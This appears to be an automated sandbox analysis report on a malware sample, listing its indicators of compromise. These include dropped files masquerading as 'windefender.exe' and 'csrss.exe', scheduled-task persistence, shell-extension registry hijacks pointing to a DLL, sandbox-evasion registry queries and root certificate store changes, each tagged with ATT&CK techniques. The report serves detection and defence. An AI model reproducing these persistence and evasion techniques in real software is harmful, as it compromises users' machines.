File created	C:\Program Files (x86)\ClocX\Presets\hallow2.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\iToolsClock2.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\weemsplath.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Lang\Srpski.lng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Aqua.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\AquaLarge.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueSphere2.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\BubbleClock.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Citizen.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\VioletteKugler.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\mars.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Bahnhofsuhr.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\MilkClock.bmp	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\Naranja.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\earth.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\klokjemin.hpng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\wonderglobe2.ini	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\Macro.dll	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Lang\Traditional_Chinese.lng	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
File created	C:\Program Files (x86)\ClocX\Presets\AquaMade.png	F4yBUpCJKyC2y0Q5QOq9UNhz.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	UafCZ03bq3wLe5tapLQOnk5r.exe
File created	C:\Windows\rss\csrss.exe	UafCZ03bq3wLe5tapLQOnk5r.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20231122015644.cab	makecab.exe
File created	C:\Windows\Tasks\bSTfouYtWkypYZNMeg.job	schtasks.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
816	sc.exe
2392	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 8 IoCs

installer

resource	yara_rule
behavioral1/files/0x0006000000018b6a-163.dat	nsis_installer_1
behavioral1/files/0x0006000000018b6a-163.dat	nsis_installer_2
behavioral1/files/0x0006000000018b6a-166.dat	nsis_installer_1
behavioral1/files/0x0006000000018b6a-166.dat	nsis_installer_2
behavioral1/files/0x0006000000018b6a-165.dat	nsis_installer_1
behavioral1/files/0x0006000000018b6a-165.dat	nsis_installer_2
behavioral1/files/0x0006000000018b6a-168.dat	nsis_installer_1
behavioral1/files/0x0006000000018b6a-168.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	axQWAftu86RVgyfsYbxmxw7K.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	axQWAftu86RVgyfsYbxmxw7K.exe

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
344	schtasks.exe
1616	schtasks.exe
2912	schtasks.exe
2276	schtasks.exe
2752	schtasks.exe
1268	schtasks.exe
2560	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1636	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-522 = "N. Central Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	UafCZ03bq3wLe5tapLQOnk5r.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	UafCZ03bq3wLe5tapLQOnk5r.exe

Modifies registry class 22 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AA3E139-A051-DDFC-47BD-2575F88E8507}	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\CLSID	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ThreadingModel = "Apartment"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ = "C:\\Program Files (x86)\\Windows NT\\Accessories\\Macro.dll"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\{e357fccd-a995-4576-b01f-234630154e96}\ = "{1AA3E139-A051-DDFC-47BD-2575F88E8507}"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ThreadingModel = "Apartment"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ = "C:\\Program Files (x86)\\Windows NT\\Accessories\\Macro.dll"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\ShellEx\{e357fccd-a995-4576-b01f-234630154e96}	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx\ = "{2EA3E139-A051-DDFC-47BD-2575F88E8507}"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ = "C:\\Program Files (x86)\\Windows NT\\Accessories\\Macro.dll"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FA3E139-A051-DDFC-47BD-2575F88E8507}	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\CLSID\{2EA3E139-A051-DDFC-47BD-2575F88E8507}	F4yBUpCJKyC2y0Q5QOq9UNhz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1AA3E139-A051-DDFC-47BD-2575F88E8507}\InProcServer32\ThreadingModel = "Apartment"	F4yBUpCJKyC2y0Q5QOq9UNhz.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	axQWAftu86RVgyfsYbxmxw7K.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
